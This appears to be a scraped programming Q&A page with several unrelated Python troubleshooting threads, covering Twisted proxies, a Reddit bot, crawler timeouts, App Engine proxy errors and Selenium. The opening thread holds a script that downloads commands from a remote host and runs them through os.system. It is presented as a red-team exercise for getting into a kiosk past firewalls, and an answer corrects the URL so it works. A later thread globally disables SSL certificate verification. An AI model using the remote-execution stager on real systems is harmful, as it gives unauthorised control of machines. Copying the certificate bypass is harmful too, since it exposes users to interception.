I have a script that is supposed to read a text file from a remote server, and then execute whatever is in the txt file.
For example, if the text file has the command: "ls". The computer will run the command and list directory.
Also, pls don't suggest using urllib2 or whatever. I want to stick with python3.x
As soon as i run it i get this error:
Traceback (most recent call last):
File "test.py", line 4, in <module>
data = urllib.request.urlopen(IP_Address)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 509, in open
req = Request(fullurl, data)
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 328, in __init__
self.full_url = url
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 354, in full_url
self._parse()
File "C:\Users\jferr\AppData\Local\Programs\Python\Python38\lib\urllib\request.py", line 383, in _parse
raise ValueError("unknown url type: %r" % self.full_url) ValueError: unknown url type: 'domain.com/test.txt'
Here is my code:
import urllib.request
IP_Address = "domain.com/test.txt"
data = urllib.request.urlopen(IP_Address)
for line in data:
print("####")
os.system(line)
Edit:
yes i realize this is a bad idea. It is a school project, we are playing red team and we are supposed to get access to a kiosk. I figured instead of writing code that will try and get around intrusion detection and firewalls, it would just be easier to execute commands from a remote server. Thanks for the help everyone!
The error occurs because your url does not include a protocol. Include "http://" (or https if you're using ssl/tls) and it should work.
As others have commented, this is a dangerous thing to do since someone could run arbitrary commands on your system this way.
Try
“http://localhost/domain.com/test.txt"
Or remote address
If local host need to run http server
Related
I need a simple reverse proxy for Python 3.
I like Twisted and its simple reverse http proxy (http://twistedmatrix.com/documents/14.0.1/_downloads/reverse-proxy.py) ...
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This example demonstrates how to run a reverse proxy.
Run this example with:
$ python reverse-proxy.py
Then visit http://localhost:8080/ in your web browser.
"""
from twisted.internet import reactor
from twisted.web import proxy, server
site = server.Site(proxy.ReverseProxyResource('www.yahoo.com', 80, ''))
reactor.listenTCP(8080, site)
reactor.run()
.... but it throws error in Python 3.
Unhandled Error
Traceback (most recent call last):
File "/usr/local/lib/python3.4/dist-packages/twisted/protocols/basic.py", line 571, in dataReceived
why = self.lineReceived(line)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/http.py", line 1752, in lineReceived
self.allContentReceived()
File "/usr/local/lib/python3.4/dist-packages/twisted/web/http.py", line 1845, in allContentReceived
req.requestReceived(command, path, version)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/http.py", line 766, in requestReceived
self.process()
--- <exception caught here> ---
File "/usr/local/lib/python3.4/dist-packages/twisted/web/server.py", line 185, in process
resrc = self.site.getResourceFor(self)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/server.py", line 791, in getResourceFor
return resource.getChildForRequest(self.resource, request)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/resource.py", line 98, in getChildForRequest
resource = resource.getChildWithDefault(pathElement, request)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/resource.py", line 201, in getChildWithDefault
return self.getChild(path, request)
File "/usr/local/lib/python3.4/dist-packages/twisted/web/proxy.py", line 278, in getChild
self.host, self.port, self.path + b'/' + urlquote(path, safe=b"").encode('utf-8'),
builtins.TypeError: Can't convert 'bytes' object to str implicitly
Is there something similar that works in python 3?
Having stumbled into this problem myself, I was disappointed to find no answer here. After some digging, I was able to get it working by changing the path argument in proxy.ReverseProxyResource to bytes rather than str, rendering the following line:
site = server.Site(proxy.ReverseProxyResource("www.yahoo.com", 80, b''))
This is necessary because twisted appends a trailing slash as bytes (ie b'/') internally.
I found this simple package on pypi, it seems to be working well and it is similarly simple.
https://pypi.python.org/pypi/maproxy
I'm trying to write a redditbot; I decided to start with a simple one, to make sure I was doing things properly, and I got a RequestException.
my code (bot.py):
import praw
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
print s.title
my praw.ini file:
# The URL prefix for OAuth-related requests.
oauth_url=https://oauth.reddit.com
# The URL prefix for regular requests.
reddit_url=https://www.reddit.com
# The URL prefix for short URLs.
short_url=https://redd.it
[bot1]
client_id=HIDDEN
client_secret=HIDDEN
password=HIDDEN
username=HIDDEN
user_agent=ILovePythonBot0.1
(where HIDDEN replaces the actual id, secret, password and username.)
my Traceback:
Traceback (most recent call last):
File "bot.py", line 3, in <module>
for s in praw.Reddit('bot1').subreddit("learnpython").hot(limit=5):
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 79, in next
return self.__next__()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 52, in __next__
self._next_batch()
File "/usr/local/lib/python2.7/dist-packages/praw/models/listing/generator.py", line 62, in _next_batch
self._listing = self._reddit.get(self.url, params=self.params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 322, in get
data = self.request('GET', path, params=params)
File "/usr/local/lib/python2.7/dist-packages/praw/reddit.py", line 406, in request
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 131, in request
params=params, url=url)
File "/usr/local/lib/python2.7/dist-packages/prawcore/sessions.py", line 70, in _request_with_retries
params=params)
File "/usr/local/lib/python2.7/dist-packages/prawcore/rate_limit.py", line 28, in call
response = request_function(*args, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/prawcore/requestor.py", line 48, in request
raise RequestException(exc, args, kwargs)
prawcore.exceptions.RequestException: error with request request() got an unexpected keyword argument 'json'
Any help would be appreciated. PS, I am using Python 2.7., on Ubuntu 14.04. Please ask me for any other information you may need.
The way i see it, it seems you have a problem with your request to Reddit API. Maybe try changing the user-agent in your in-file configuration. According to PRAW basic configuration Options the user-agent should follow a format <platform>:<app ID>:<version string> (by /u/<reddit username>) . Try that see what happens.
I have a Python script that downloads product feeds from multiple affiliates in different ways. This didn't give me any problems until last Wednesday, when it started throwing all kinds of timeout exceptions from different locations.
Examples: Here I connect with a FTP service:
ftp = FTP(host=self.host)
threw:
Exception in thread Thread-7:
Traceback (most recent call last):
File "C:\Python27\Lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\Lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\LDLC.py", line 23, in main
ftp = FTP(host=self.host)
File "C:\Python27\Lib\ftplib.py", line 120, in __init__
self.connect(host)
File "C:\Python27\Lib\ftplib.py", line 138, in connect
self.welcome = self.getresp()
File "C:\Python27\Lib\ftplib.py", line 215, in getresp
resp = self.getmultiline()
File "C:\Python27\Lib\ftplib.py", line 201, in getmultiline
line = self.getline()
File "C:\Python27\Lib\ftplib.py", line 186, in getline
line = self.file.readline(self.maxline + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
timeout: timed out
Or downloading an XML File :
xmlFile = urllib.URLopener()
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
xmlFile.close()
throws:
File "C:\Users\Administrator\Documents\Crawler\src\Crawlers\FeedCrawler.py", line 106, in save
xmlFile.retrieve(url, self.feedPath + affiliate + "/" + website + '.' + fileType)
File "C:\Python27\Lib\urllib.py", line 240, in retrieve
fp = self.open(url, data)
File "C:\Python27\Lib\urllib.py", line 208, in open
return getattr(self, name)(url)
File "C:\Python27\Lib\urllib.py", line 346, in open_http
errcode, errmsg, headers = h.getreply()
File "C:\Python27\Lib\httplib.py", line 1139, in getreply
response = self._conn.getresponse()
File "C:\Python27\Lib\httplib.py", line 1067, in getresponse
response.begin()
File "C:\Python27\Lib\httplib.py", line 409, in begin
version, status, reason = self._read_status()
File "C:\Python27\Lib\httplib.py", line 365, in _read_status
line = self.fp.readline(_MAXLINE + 1)
File "C:\Python27\Lib\socket.py", line 476, in readline
data = self._sock.recv(self._rbufsize)
IOError: [Errno socket error] timed out
These are just two examples but there are other methods, like authenticate or other API specific methods where my script throws these timeout errors. It never showed this behavior until Wednesday. Also, it starts throwing them at random times. Sometimes at the beginning of the crawl, sometimes later on. My script has this behavior on both my server and my local machine. I've been struggling with it for two days now but can't seem to figure it out.
This is what I know might have caused this:
On Wednesday one affiliate script broke down with the following error:
URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:581)>
I didn't change anything to my script but suddenly it stopped crawling that affiliate and threw that error all the time where I tried to authenticate. I looked it up and found that is was due to an OpenSSL error (where did that come from). I fixed it by adding the following before the authenticate method:
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
Little did I know, this was just the start of my problems... At that same time, I changed from Python 2.7.8 to Python 2.7.9. It seems that this is the moment that everything broke down and started throwing timeouts.
I tried changing my script in endless ways but nothing worked and like I said, it's not just one method that throws it. Also I switched back to Python 2.7.8, but this didn't do the trick either. Basically everything that makes a request to an external source can throw an error.
Final note: My script is multi threaded. It downloads product feeds from different affiliates at the same time. It used to run 10 threads per affiliate without a problem. Now I tried lowering it to 3 per affiliate, but it still throws these errors. Setting it to 1 is no option because that will take ages. I don't think that's the problem anyway because it used to work fine.
What could be wrong?
After updating from 1.7.5 (where everything worked fine) I'm getting a HTTP Error 403: Forbidden when trying to open any sites via localhost. Strange thing is I have pretty much the same setup at home as here at work and everything works there... Might be an issue with proxy server we're using at work, since that's the only difference I can think of? Here's the error log I'm getting, so if anyone knows what's going on please help (;
Traceback (most recent call last):
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 1302, in communicate
req.respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 831, in respond
self.server.gateway(self).respond()
File "U:\Dev\GAE\lib\cherrypy\cherrypy\wsgiserver\wsgiserver2.py", line 2115, in respond
response = self.req.server.wsgi_app(self.env, self.start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\wsgi_server.py", line 246, in __call__
return app(environ, start_response)
File "U:\Dev\GAE\google\appengine\tools\devappserver2\request_rewriter.py", line 311, in _rewriter_middleware
response_body = iter(application(environ, wrapped_start_response))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 89, in __call__
self._flush_logs(response.get('logs', []))
File "U:\Dev\GAE\google\appengine\tools\devappserver2\python\request_handler.py", line 220, in _flush_logs
apiproxy_stub_map.MakeSyncCall('logservice', 'Flush', request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 94, in MakeSyncCall
return stubmap.MakeSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\api\apiproxy_stub_map.py", line 320, in MakeSyncCall
rpc.CheckSuccess()
File "U:\Dev\GAE\google\appengine\api\apiproxy_rpc.py", line 156, in _WaitImpl
self.request, self.response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 200, in MakeSyncCall
self._MakeRealSyncCall(service, call, request, response)
File "U:\Dev\GAE\google\appengine\ext\remote_api\remote_api_stub.py", line 226, in _MakeRealSyncCall
encoded_response = self._server.Send(self._path, encoded_request)
File "U:\Dev\GAE\google\appengine\tools\appengine_rpc.py", line 393, in Send
f = self.opener.open(req)
File "U:\Dev\Python\lib\urllib2.py", line 410, in open
response = meth(req, response)
File "U:\Dev\Python\lib\urllib2.py", line 523, in http_response
'http', request, response, code, msg, hdrs)
File "U:\Dev\Python\lib\urllib2.py", line 448, in error
return self._call_chain(*args)
File "U:\Dev\Python\lib\urllib2.py", line 382, in _call_chain
result = func(*args)
File "U:\Dev\Python\lib\urllib2.py", line 531, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 403: Forbidden
INFO 2013-04-19 12:28:52,576 server.py:561] default: "GET / HTTP/1.1" 500 -
INFO 2013-04-19 12:28:52,619 server.py:561] default: "GET /favicon.ico HTTP/1.1" 304 -
Also, the launcher throws an error when closing:
Traceback (most recent call last):
File "launcher\mainframe.pyc", line 327, in OnStop
File "launcher\taskcontroller.pyc", line 167, in Stop
File "launcher\dev_appserver_task_thread.pyc", line 82, in stop
File "launcher\taskthread.pyc", line 107, in stop
File "launcher\platform.pyc", line 397, in KillProcess
pywintypes.error: (5, 'TerminateProcess', 'Access is denied.')
I had this very same issue with my MacOSX when using a proxy server using Google App Engine Launcher 1.8.6. Apparently there's an issue with "proxy_bypass" on "urllib2.py".
There are two possible solutions:
Downgrade to 1.7.5, but, who wants to downgrade?
Edit "[GAE Instalattion path]/google/appengine/tools/appengine_rpc.py" and look for the line that says
opener.add_handler(fancy_urllib.FancyProxyHandler())
In my computer it was line 578, and then put a hash (#) at the beginning of the line, like this:
`#opener.add_handler(fancy_urllib.FancyProxyHandler())`
Save the file, stop and then restart your application. Now dev_appserver.py shouldn't try to use any proxy server at all.
If your application uses any external resources like a SOAP Webservice or something like that and you can't reach the server without the proxy server, then you'll have to downgrade. Please keep in mind that external javascript files (like facebook SDK or similar) are loaded from your browser, not from your application.
Since I'm not using any external REST or SOAP services it worked for me!
Hopefully it will work for you as well.
Try either:
-Accessing it through a different proxy. I.E a . proxy within a proxy
-Accessing it through your local IP i.e 192.168.1.1
I faced the same issue with version 1.9.5. Seems that the API proxy is sending some RPCs to the proxy server, which are then being rejected with HTTP 403 (since proxy servers are generally configured to reject connection attempts to arbitrary ports). In my case I was using the urlfetch module in my app to access external web pages, so disabling the proxy server was not a choice for me.
This is how I worked around the issue some time back (most probably it was based on comments found under this issue, but I cannot remember the exact sources).
NOTE:
For this approach to work, you'll have to know the hostname/IP address and default port of your proxy server, and change them appropriately in the code if you happen to connect to a different proxy server.
When you are not behind the proxy server, you will have to revert the applied changes in order to return to a working state (if you want internet access inside your app).
Here it goes:
Disable proxy settings for the Python (Google App Engine Launcher) environment in some way. (In my case it was easy since I was launching the dev_appserver.py from a Terminal shell (on Linux), and the unset http_proxy and unset https_proxy commands did the trick.)
Edit {App Engine SDK root}/google/appengine/api/urlfetch_stub.py. Find the code block
if _CONNECTION_SUPPORTS_TIMEOUT:
connection = connection_class(host, timeout=deadline)
else:
connection = connection_class(host)
(lines 376-379 in my case) and replace it with:
if _CONNECTION_SUPPORTS_TIMEOUT:
if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
connection = connection_class(host, timeout=deadline)
else:
connection = connection_class('your_proxy_host_goes_here', your_proxy_port_number_goes_here, timeout=deadline)
else:
if host[:9] == 'localhost' or host[:9] == '127.0.0.1':
connection = connection_class(host)
else:
connection = connection_class('your_proxy_host_goes_here', your_proxy_port_number_goes_here)
replacing the placeholders your_proxy_host_goes_here and your_proxy_port_number_goes_here with appropriate values.
(I believe this code can be written more elegantly, though... any Python geeks out there? :) )
In my case, I also had to delete the existing compiled file urlfetch_stub.pyc (located in the same directory as urlfetch_stub.py) because the SDK didn't seem to pick up the changes until I did so.
Now you can use dev_appserver to launch your app, and use urlfetch-backed services within the app, free from HTTP 403 errors.
I've been using urllib2 to access webpages, but it doesn't support javascript, so I took a look at Selenium, but I'm quite confused even having read its docs.
I downloaded Selenium IDE add-on for firefox and I tried some simple things.
from selenium import selenium
import unittest, time, re
class test(unittest.TestCase):
def setUp(self):
self.verificationErrors = []
self.selenium = selenium("localhost", 4444, "*chrome", "http://www.wikipedia.org/")
self.selenium.start()
def test_test(self):
sel = self.selenium
sel.open("/")
sel.type("searchInput", "pacific ocean")
sel.click("go")
sel.wait_for_page_to_load("30000")
def tearDown(self):
self.selenium.stop()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
I just access wikipedia.org and type pacific ocean in the search field, but when I try to compile it, it gives me a lot of errors.
If running the script results in a [Errno 111] Connection refused error such as this:
% test.py
E
======================================================================
ERROR: test_test (__main__.test)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/unutbu/pybin/test.py", line 11, in setUp
self.selenium.start()
File "/data1/unutbu/pybin/selenium.py", line 189, in start
result = self.get_string("getNewBrowserSession", [self.browserStartCommand, self.browserURL, self.extensionJs])
File "/data1/unutbu/pybin/selenium.py", line 219, in get_string
result = self.do_command(verb, args)
File "/data1/unutbu/pybin/selenium.py", line 207, in do_command
conn.request("POST", "/selenium-server/driver/", body, headers)
File "/usr/lib/python2.6/httplib.py", line 898, in request
self._send_request(method, url, body, headers)
File "/usr/lib/python2.6/httplib.py", line 935, in _send_request
self.endheaders()
File "/usr/lib/python2.6/httplib.py", line 892, in endheaders
self._send_output()
File "/usr/lib/python2.6/httplib.py", line 764, in _send_output
self.send(msg)
File "/usr/lib/python2.6/httplib.py", line 723, in send
self.connect()
File "/usr/lib/python2.6/httplib.py", line 704, in connect
self.timeout)
File "/usr/lib/python2.6/socket.py", line 514, in create_connection
raise error, msg
error: [Errno 111] Connection refused
----------------------------------------------------------------------
Ran 1 test in 0.063s
FAILED (errors=1)
then the solution is most likely that you need get the selenium server running first.
In the download for SeleniumRC you will find a file called selenium-server.jar (as of a few months ago, that file was located at SeleniumRC/selenium-server-1.0.3/selenium-server.jar).
On Linux, you could run the selenium server in the background with the command
java -jar /path/to/selenium-server.jar 2>/dev/null 1>&2 &
You will find more complete instructions on how to set up the server here.
I would suggest you to use a webdriver, you can find it here: http://code.google.com/p/selenium/downloads/list. If you want to write tests as a coder (and not with the use of your mouse), that thing would work better then the RC version you're trying to use, at least because it would not ask you for an SeleniumRC Jar Instance. You would simply have a binary of a browser or use those ones that are already installed on your system, for example, Firefox.
I faced with this issue in my project and found that problem was in few webdriver.get calls with very small time interval between them. My fix was not to put delay, just remove unneeded calls and error disappears.
Hope, it can helps for somebody.